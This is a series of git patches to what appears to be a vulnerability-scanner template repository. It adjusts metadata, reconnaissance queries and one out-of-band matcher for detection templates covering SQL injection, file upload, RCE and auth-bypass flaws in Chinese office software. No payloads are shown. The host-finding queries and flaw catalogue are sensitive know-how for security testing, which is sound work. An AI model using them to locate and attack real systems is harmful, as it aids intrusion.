diff --git a/http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml b/http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml
index 391c58ed0f..0acbc5b32a 100755
--- a/http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml
+++ b/http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml
@@ -11,8 +11,8 @@ info:
     - http://wiki.peiqi.tech/wiki/oa/致远OA/致远OA%20wpsAssistServlet%20任意文件上传漏洞.html
     - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA%20wpsAssistServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
   metadata:
-    max-request: 1
     fofa-query: app="致远互联-OA" && title="V8.0SP2"
+    max-request: 2
     verified: true
   tags: seeyon,oa,file-upload,intrusive
 
diff --git a/http/vulnerabilities/smartbi/smartbi-deserialization.yaml b/http/vulnerabilities/smartbi/smartbi-deserialization.yaml
index 52a105cc27..fd282f20bd 100755
--- a/http/vulnerabilities/smartbi/smartbi-deserialization.yaml
+++ b/http/vulnerabilities/smartbi/smartbi-deserialization.yaml
@@ -11,8 +11,8 @@ info:
     - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/smartbi-windowunloading-other.yaml
     - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Smartbi%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
   metadata:
-    max-request: 1
     fofa-query: app="SMARTBI"
+    max-request: 2
     verified: true
   tags: smartbi,deserialization
 
diff --git a/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml b/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml
index 7253a8ede3..e9459be72a 100755
--- a/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml
+++ b/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml
@@ -10,9 +10,9 @@ info:
     - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v2017%20action_upload.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
     - https://github.com/shadow1ng/fscan/blob/main/WebScan/pocs/tongda-v2017-uploadfile.yml
   metadata:
-    max-request: 1
-    verified: true
     fofa-query: app="TDXK-通达OA"
+    max-request: 2
+    verified: true
   tags: tongda,fileupload,intrusive,router
 
 variables:
diff --git a/http/vulnerabilities/tongda/tongda-api-file-upload.yaml b/http/vulnerabilities/tongda/tongda-api-file-upload.yaml
index 466f7e0804..566e9928a2 100755
--- a/http/vulnerabilities/tongda/tongda-api-file-upload.yaml
+++ b/http/vulnerabilities/tongda/tongda-api-file-upload.yaml
@@ -9,8 +9,8 @@ info:
   reference:
     - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-oa-api-ali-upload.yaml
   metadata:
-    max-request: 1
     fofa-query: app="TDXK-通达OA"
+    max-request: 3
     verified: true
   tags: tongda,oa,fileupload
 
diff --git a/http/vulnerabilities/tongda/tongda-getway-rfi.yaml b/http/vulnerabilities/tongda/tongda-getway-rfi.yaml
index 4ffdd9da1c..f80d505824 100755
--- a/http/vulnerabilities/tongda/tongda-getway-rfi.yaml
+++ b/http/vulnerabilities/tongda/tongda-getway-rfi.yaml
@@ -9,8 +9,8 @@ info:
   reference:
     - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E9%80%9A%E8%BE%BEOA%20v11.8%20getway.php%20%E8%BF%9C%E7%A8%8B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E.md
   metadata:
-    max-request: 1
     fofa-query: app="TDXK-通达OA"
+    max-request: 2
     verified: true
   tags: tongda,rfi
 
diff --git a/http/vulnerabilities/tongda/tongda-insert-sqli.yaml b/http/vulnerabilities/tongda/tongda-insert-sqli.yaml
index afb03e3809..d08579db1e 100755
--- a/http/vulnerabilities/tongda/tongda-insert-sqli.yaml
+++ b/http/vulnerabilities/tongda/tongda-insert-sqli.yaml
@@ -9,9 +9,9 @@ info:
   reference:
     - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20insert%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
   metadata:
-    max-request: 1
-    verified: true
     fofa-query: app="TDXK-通达OA"
+    max-request: 2
+    verified: true
   tags: tongda,sqli
 
 http:
diff --git a/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml b/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml
index 3b9fdb9b40..2133a19fe8 100755
--- a/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml
+++ b/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml
@@ -9,9 +9,9 @@ info:
   reference:
     - https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json
   metadata:
-    max-request: 1
-    verified: true
     fofa-query: title="TopApp-LB 负载均衡系统"
+    max-request: 2
+    verified: true
   tags: topsec,topapplb,auth-bypass
 
 http:
diff --git a/http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml b/http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml
index 40b0e01945..36dcd92802 100755
--- a/http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml
+++ b/http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml
@@ -10,6 +10,7 @@ info:
     - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20VerifyQuickLogin.jsp%20%E4%BB%BB%E6%84%8F%E7%AE%A1%E7%90%86%E5%91%98%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E.html
   metadata:
     fofa-query: app="泛微-协同办公OA"
+    max-request: 1
   tags: ecology,weaver,oa,auth-bypass
 
 http:
diff --git a/http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml b/http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml
index a7bf35dcfc..5d9d682778 100755
--- a/http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml
+++ b/http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     In the validate.jsp file of the Panwei e-cology OA system, the parameter capitalid is not strictly filtered, which can lead to SQL injection vulnerabilities. An attacker can use this vulnerability to remotely send carefully constructed SQL statements without authorization, thereby obtaining sensitive database information.
+  metadata:
+    max-request: 1
   tags: ecology,weaver,sqli
 
 variables:
diff --git a/http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml b/http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml
index ee7fd28463..e768d9c964 100644
--- a/http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml
+++ b/http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml
@@ -9,10 +9,10 @@ info:
   reference:
     - https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Bridge%20saveYZJFile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
   metadata:
-    max-request: 1
-    verified: true
-    shodan-query: eBridge_JSessionid
     fofa-query: app="泛微云桥e-Bridge"
+    max-request: 4
+    shodan-query: eBridge_JSessionid
+    verified: true
   tags: eBridge,weaver,oa,lfi,lfr,intrusive
 
 http:
diff --git a/http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml b/http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml
index 8e5c6d62c7..c0b9814328 100755
--- a/http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml
+++ b/http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml
@@ -7,10 +7,10 @@ info:
   description: |
     Weaver BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
   metadata:
-    max-request: 1
-    verified: true
-    shodan-query: ecology_JSessionid
     fofa-query: app="泛微-协同办公OA"
+    max-request: 2
+    shodan-query: ecology_JSessionid
+    verified: true
   tags: beanshell,rce,weaver
 
 http:
diff --git a/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml b/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml
index b1b7a7bf2f..301dbd80b6 100755
--- a/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml
+++ b/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml
@@ -10,8 +10,8 @@ info:
     - http://wiki.peiqi.tech/wiki/oa/泛微OA/泛微OA%20E-Office%20group_xml.php%20SQL注入漏洞.html
     - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Office%20group_xml.php%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
   metadata:
-    max-request: 1
     fofa-query: app="泛微-EOffice"
+    max-request: 2
     verified: true
   tags: weaver,e-office,oa,sqli
 
diff --git a/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml b/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml
index c64cb2adf5..24fd439370 100755
--- a/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml
@@ -7,8 +7,8 @@ info:
   reference:
     - https://github.com/w-digital-scanner/w9scan/blob/master/plugins/weaver_oa/2158.py
   metadata:
-    max-request: 1
     fofa-query: app="泛微-EOffice"
+    max-request: 3
     verified: true
   tags: weaver,e-office,oa,instrusive,rce
 
diff --git a/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml b/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml
index f8665fcc3d..3723f72ccb 100755
--- a/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml
@@ -7,8 +7,8 @@ info:
   reference:
     - https://github.com/w-digital-scanner/w9scan/blob/master/plugins/weaver_oa/2158.py
   metadata:
-    max-request: 1
     fofa-query: app="泛微-EOffice"
+    max-request: 3
     verified: true
   tags: weaver,e-office,intrusive,rce,file-upload
 
diff --git a/http/vulnerabilities/weaver/weaver-login-sessionkey.yaml b/http/vulnerabilities/weaver/weaver-login-sessionkey.yaml
index a9c42554d5..b93cedc69d 100644
--- a/http/vulnerabilities/weaver/weaver-login-sessionkey.yaml
+++ b/http/vulnerabilities/weaver/weaver-login-sessionkey.yaml
@@ -5,7 +5,7 @@ info:
   author: SleepingBag945
   severity: high
   metadata:
-    max-request: 1
+    max-request: 2
     shodan-query: http.html:"E-Mobile"
   tags: weaver,e-mobile,oa
 
diff --git a/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml b/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml
index 26a4134b10..0ce0b8217c 100755
--- a/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml
@@ -9,8 +9,8 @@ info:
   reference:
     - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Office%20OfficeServer.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
   metadata:
-    max-request: 1
     fofa-query: app="泛微-EOffice"
+    max-request: 2
     verified: true
   tags: weaver,e-office,oa,rce,intrusive,fileupload
 
diff --git a/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml
index c5ffdcbcc3..8a18336fea 100755
--- a/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml
@@ -7,8 +7,8 @@ info:
   reference:
     - https://github.com/w-digital-scanner/w9scan/blob/master/plugins/weaver_oa/2158.py
   metadata:
-    max-request: 1
     fofa-query: app="泛微-EOffice"
+    max-request: 3
     verified: true
   tags: weaver,e-office,oa,instrusive,rce
 
diff --git a/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml b/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml
index c9ae09300c..f405a9cade 100755
--- a/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml
@@ -11,6 +11,7 @@ info:
     - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/weaver-oa-workrelate-file-upload.yaml
   metadata:
     fofa-query: app="泛微-协同办公OA"
+    max-request: 3
   tags: ecology,fileupload,intrusive
 
 variables:
diff --git a/http/vulnerabilities/yonyou/chanjet-tplus-rce.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-rce.yaml
index fef9baf76a..0b9a57a6a8 100644
--- a/http/vulnerabilities/yonyou/chanjet-tplus-rce.yaml
+++ b/http/vulnerabilities/yonyou/chanjet-tplus-rce.yaml
@@ -11,6 +11,7 @@ info:
     - https://github.com/MrWQ/vulnerability-paper/blob/7551f7584bd35039028b1d9473a00201ed18e6b2/bugs/%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
   metadata:
     fofa-query: app="畅捷通-TPlus"
+    max-request: 1
     verified: true
   tags: chanjettplus,rce
 
diff --git a/http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml b/http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml
index 6c165c4cea..a34ef33d12 100755
--- a/http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml
@@ -5,12 +5,12 @@ info:
   author: SleepingBag945
   severity: medium
   description: |
-     There is a directory traversal vulnerability in the templateOfTaohong_manager.jsp file of UFIDA FE collaborative office platform. Through the vulnerability, attackers can obtain directory files and other information, leading to further attacks.
+    There is a directory traversal vulnerability in the templateOfTaohong_manager.jsp file of UFIDA FE collaborative office platform. Through the vulnerability, attackers can obtain directory files and other information, leading to further attacks.
   reference:
     - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20FE%E5%8D%8F%E4%BD%9C%E5%8A%9E%E5%85%AC%E5%B9%B3%E5%8F%B0%20templateOfTaohong_manager.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md
   metadata:
-    max-request: 2
-    fofa-query: "FE协作"
+    fofa-query: FE协作
+    max-request: 1
     verified: true
   tags: yonyou,fe,lfi
 
diff --git a/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml
index cd227fa523..4e26984d81 100755
--- a/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml
@@ -9,8 +9,8 @@ info:
   reference:
     - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-nc-arbitrary-file-upload.yaml
   metadata:
-    max-request: 1
     fofa-query: app="用友-UFIDA-NC"
+    max-request: 2
     verified: true
   tags: yonyou,file-upload,intrusive
 
diff --git a/http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml b/http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml
index 4a8f9d142f..2474a6d4e8 100755
--- a/http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml
@@ -7,6 +7,8 @@ info:
   description: UFIDA GRP-u8 has an XXE vulnerability. This vulnerability is caused by the application not loading external entities when parsing XML input, resulting in the loading of external SQL statements and command execution.
   reference:
     - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html
+  metadata:
+    max-request: 1
   tags: yonyou,grp,xxe,sqli
 
 variables:
diff --git a/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml
index b4398dc98e..15bf2069d3 100755
--- a/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml
@@ -10,6 +10,7 @@ info:
     - https://github.com/lal0ne/vulnerability/blob/c0985107adfd91d85fbd76d9a8acf8fbfa98ed41/YonyouNC/ncDecode/README.md
   metadata:
     fofa-query: icon_hash="1085941792"
+    max-request: 2
     verified: true
   tags: yonyou,intrusive,fileupload
 

From 04f441a9f0e4c868a63074ac004f7fc8b36d0b15 Mon Sep 17 00:00:00 2001
From: Prince Chaddha 
Date: Mon, 18 Sep 2023 18:22:23 +0530
Subject: [PATCH 0430/1090] fixed OAST

---
 http/vulnerabilities/{yonyou => }/chanjet-tplus-rce.yaml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
 rename http/vulnerabilities/{yonyou => }/chanjet-tplus-rce.yaml (96%)

diff --git a/http/vulnerabilities/yonyou/chanjet-tplus-rce.yaml b/http/vulnerabilities/chanjet-tplus-rce.yaml
similarity index 96%
rename from http/vulnerabilities/yonyou/chanjet-tplus-rce.yaml
rename to http/vulnerabilities/chanjet-tplus-rce.yaml
index 0b9a57a6a8..708cd2a2fd 100644
--- a/http/vulnerabilities/yonyou/chanjet-tplus-rce.yaml
+++ b/http/vulnerabilities/chanjet-tplus-rce.yaml
@@ -13,7 +13,7 @@ info:
     fofa-query: app="畅捷通-TPlus"
     max-request: 1
     verified: true
-  tags: chanjettplus,rce
+  tags: chanjettplus,rce,oast
 
 http:
   - raw:
@@ -37,7 +37,7 @@ http:
           }
         }
 
-    matchers-condition: or
+    matchers-condition: and
     matchers:
       - type: word
         part: body
@@ -51,4 +51,4 @@ http:
       - type: word
         part: interactsh_protocol
         words:
-          - "dns"
\ No newline at end of file
+          - "dns"

From 89d0883d216417c42048f4c07aadff459cdc9bbe Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Mon, 18 Sep 2023 13:17:59 +0000
Subject: [PATCH 0431/1090] Auto Generated New Template Addition List [Mon Sep
 18 13:17:59 UTC 2023] :robot:

---
 .new-additions | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.new-additions b/.new-additions
index 5301f010ce..340f789aed 100644
--- a/.new-additions
+++ b/.new-additions
@@ -30,6 +30,7 @@ http/misconfiguration/gitlab/gitlab-public-registration.yaml
 http/osint/hackenproof.yaml
 http/osint/intigriti.yaml
 http/osint/yeswehack.yaml
+http/vulnerabilities/chanjet-tplus-rce.yaml
 http/vulnerabilities/dbgate-unauth-rce.yaml
 http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml
 http/vulnerabilities/landray/landray-oa-treexml-rce.yaml
@@ -105,7 +106,6 @@ http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml
 http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml
 http/vulnerabilities/yonyou/chanjet-tplus-file-read.yaml
 http/vulnerabilities/yonyou/chanjet-tplus-fileupload.yaml
-http/vulnerabilities/yonyou/chanjet-tplus-rce.yaml
 http/vulnerabilities/yonyou/chanjet-tplus-ufida-sqli.yaml
 http/vulnerabilities/yonyou/grp-u8-uploadfiledata-fileupload.yaml
 http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml

From a40eeb7dcfd031766914208c2485dc3b61ffc9c9 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Mon, 18 Sep 2023 13:18:07 +0000
Subject: [PATCH 0432/1090] Auto Generated Templates Checksum [Mon Sep 18
 13:18:07 UTC 2023] :robot:

---
 templates-checksum.txt | 64 +++++++++++++++++++++---------------------
 1 file changed, 32 insertions(+), 32 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 4d9379c68c..d61b247026 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -8,8 +8,8 @@ TEMPLATES-STATS.json:46e94935eba8934af2bfd77e17dd4bb352a4ec0d
 TEMPLATES-STATS.md:3f74e66db0aeaf37e1b9d401f4d8fc23bc8a059f
 TOP-10.md:d9e01f12d3aad16e5a340a0d8d59a87dc902e62c
 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9
-cves.json:7bb863abb05ebec558fb0945d6a25c1916359b13
-cves.json-checksum.txt:070c22ce9772392db131ab4a99a945b9fcc6dea5
+cves.json:a1e9432abfa90bc1b48c05fa1278519b055862dc
+cves.json-checksum.txt:7b5ad7d2d0751827d6679f426171b866ab275d0f
 dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c
 dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161
 dns/detect-dangling-cname.yaml:bba3b5b57357e86830d9f76e28b988107597b75c
@@ -607,7 +607,7 @@ http/cnvd/2022/CNVD-2022-43245.yaml:1cf34d3bee03bd6dc6aab3729d790f56c8bc6264
 http/cnvd/2022/CNVD-2022-86535.yaml:9dd03071fc9795f7ae4d99c59b3fd5342f5a5c70
 http/cnvd/2023/CNVD-2023-08743.yaml:1af1612ebc8033360c527b5a94c5e5276aac06ad
 http/cnvd/2023/CNVD-2023-12632.yaml:ceb1220ec85f8ba6607052d3ab2c9be79bd1a429
-http/cnvd/2023/CNVD-C-2023-76801.yaml:dc4eaf2a5db728835805aae29c1d1d2f9f250b48
+http/cnvd/2023/CNVD-C-2023-76801.yaml:e3f9a0f364fcf716b2440c86680f5b402fa32a48
 http/credential-stuffing/README.md:88a738a7af33e930f046a6681114389b2f341fa2
 http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml:e265b0ef4cad374b888878d8ebe4cd4bfb3a4c2e
 http/credential-stuffing/cloud/atlassian-login-check.yaml:fdc2a219979a9c538febf42cd8170a6cd8f2eabe
@@ -2777,7 +2777,7 @@ http/default-logins/seeyon/seeyon-a8-default-login.yaml:3b0a402d36dc58842c171145
 http/default-logins/seeyon/seeyon-monitor-default-login.yaml:f0d81df89f683efcf4511d165c3d117841be7dfb
 http/default-logins/sequoiadb/sequoiadb-default-login.yaml:e7b11fa64e9a06940019b8857dbf98efd342e0a8
 http/default-logins/showdoc/showdoc-default-login.yaml:3aaaaffb958f089d1d25fa67de408faad0dcf533
-http/default-logins/smartbi/smartbi-default-login.yaml:3740b1438db587745849d17c2e4f2ead59a43e9d
+http/default-logins/smartbi/smartbi-default-login.yaml:7fcc2691255d3f1c5f3626f73747fda0b2d32623
 http/default-logins/solarwinds/solarwinds-default-login.yaml:55c8cbfbcc7c1c74207dde1fd080deaaa1900510
 http/default-logins/sonarqube/sonarqube-default-login.yaml:b8d2672004b87c808104b16c45f538e869ea87ac
 http/default-logins/spectracom/spectracom-default-login.yaml:ea22a3032497ef474f537a030442c8504debc6cd
@@ -6330,6 +6330,7 @@ http/vulnerabilities/avtech/avtech-unauth-file-download.yaml:15e280ee1d7344056e9
 http/vulnerabilities/avtech/avtech-verification-bypass.yaml:9497012b89ada0ee6f48be0af32ef2033ec8a47a
 http/vulnerabilities/backdoor/jexboss-backdoor.yaml:2b4e3596c572a9d4429e1f23d90251d082d0fc89
 http/vulnerabilities/bsphp-info.yaml:9cd24e3775c993c85fea60e5499f2195e1d2ed23
+http/vulnerabilities/chanjet-tplus-rce.yaml:dcd7832a0376d28a761b833aa60ee1aefa6fc739
 http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml:8af1618f2246b3de340bb45ca72b6d8b864836a8
 http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml:4d6b0c0c843d1f53d635bdf06533cf90c409c5b9
 http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml:e83c7299fb5fa09709f46b540fa9a8f8273348c4
@@ -6729,13 +6730,13 @@ http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml:42cee554704f6f55298af07ce618
 http/vulnerabilities/qibocms-file-download.yaml:7763d29c8ae95f8db4ccb87330ef4ba17d612e87
 http/vulnerabilities/rails/rails6-xss.yaml:be4693b2fa2357ea1f472af859b4ad187c08981b
 http/vulnerabilities/ransomware/deadbolt-ransomware.yaml:e5607baf170fc08d2fd0624e52db07ec5f6e845e
-http/vulnerabilities/realor/realor-gwt-system-sqli.yaml:b83ddd93bcfa00a8639078231e80480d1a305c6c
+http/vulnerabilities/realor/realor-gwt-system-sqli.yaml:5952b03f57e0584b9c39fa45ed5440e8a0837efb
 http/vulnerabilities/rocketchat/unauth-message-read.yaml:f9d0dc61da7d76cd6f03366bebdfe259f35b6ac7
 http/vulnerabilities/royalevent/royalevent-management-xss.yaml:d0b767e7f08117d1fa3a89d8b40e32f3dd8713bf
 http/vulnerabilities/royalevent/royalevent-stored-xss.yaml:3d6127ac472e3c9dd8af375d0fc4d4a9c8059cd6
 http/vulnerabilities/ruijie/ruijie-eg-rce.yaml:63eb5abebc6ec7d0055854820bf6267dfff1b41f
 http/vulnerabilities/ruijie/ruijie-excu-shell.yaml:a4f536339914f668cecbb8e1cd99f01affe9620a
-http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml:7c4f2f0cef2efbe60462a040267e6a89fd7a5f42
+http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml:d91f6b09b136b5af4b44eb463152be608fa85511
 http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml:3982a8ffcf669b467aea0c6399390dd878ee1efc
 http/vulnerabilities/ruijie/ruijie-password-leak.yaml:7d24e3ef4bb5d25b53d03c03351b6a179bd7dba8
 http/vulnerabilities/ruijie-eg-login-rce.yaml:689b4c6366b5be4e4c708ed1d033c34571e9e7f0
@@ -6746,13 +6747,13 @@ http/vulnerabilities/sangfor/sangfor-ba-rce.yaml:a209df79ba30018390c9b073e9a95b0
 http/vulnerabilities/sangfor/sangfor-edr-auth-bypass.yaml:70d3869515f570a81f2d02560eded4b993f69c36
 http/vulnerabilities/sangfor/sangfor-edr-rce.yaml:df6a81d61c37ab20465d4813f87996d12bbd13a0
 http/vulnerabilities/sangfor/sangfor-login-rce.yaml:a720ca9db985ab55c9a328fb1107683295fc680a
-http/vulnerabilities/secworld/secgate-3600-file-upload.yaml:a10a424ee80b16c46c842e8cd7d6eec194d6acb8
+http/vulnerabilities/secworld/secgate-3600-file-upload.yaml:8c98ce4521da27a8bc3a5ccb75556730dbb2582c
 http/vulnerabilities/seeyon/seeyon-config-exposure.yaml:c4ab1e1bb2af2486dc550cf27491408bfced8034
-http/vulnerabilities/seeyon/seeyon-createmysql-exposure.yaml:289bf0c8299fb6cdcde2cc1cbee14b10926d3802
+http/vulnerabilities/seeyon/seeyon-createmysql-exposure.yaml:d19bd6a5cbecb7131bb8ac4a2ec4b5b9f67914a7
 http/vulnerabilities/seeyon/seeyon-initdata-exposure.yaml:7adbccb8f0c02c43bb70f230d9618a73d18895af
 http/vulnerabilities/seeyon/seeyon-oa-fastjson-rce.yaml:ea5b1e62d4a94080dfa827d7d917147dba909538
 http/vulnerabilities/seeyon/seeyon-oa-setextno-sqli.yaml:381f9de7750b738a8f7c95b26ea40b1da090b063
-http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml:4c034f6b124528f6b516ebc08c5f4be764413af2
+http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml:9a3ddfed0aa9316bc087bae93633dfc865981652
 http/vulnerabilities/seeyon/wooyun-2015-148227.yaml:08ed63eb05031b4eec0254c9378951d0a1195c45
 http/vulnerabilities/seeyon/zhiyuan-file-upload.yaml:6915ee2d00659128d29a47da1b6781e338fc9c5d
 http/vulnerabilities/seeyon/zhiyuan-oa-info-leak.yaml:4682cf1b5cd4d6eb1390de101c2e80ef9d1832ed
@@ -6760,7 +6761,7 @@ http/vulnerabilities/seeyon/zhiyuan-oa-session-leak.yaml:206e69434dcd7c95483ca9d
 http/vulnerabilities/shiziyu-cms/shiziyu-cms-apicontroller-sqli.yaml:ddce490ca7998d9bf60d0d297df04d09fc2d05a8
 http/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml:1962b0c186d588742508f73b5134511990e2162d
 http/vulnerabilities/sitecore/sitecore-xml-xss.yaml:414d0c93f794d0a8fb943d2a9ae65feb54d8a350
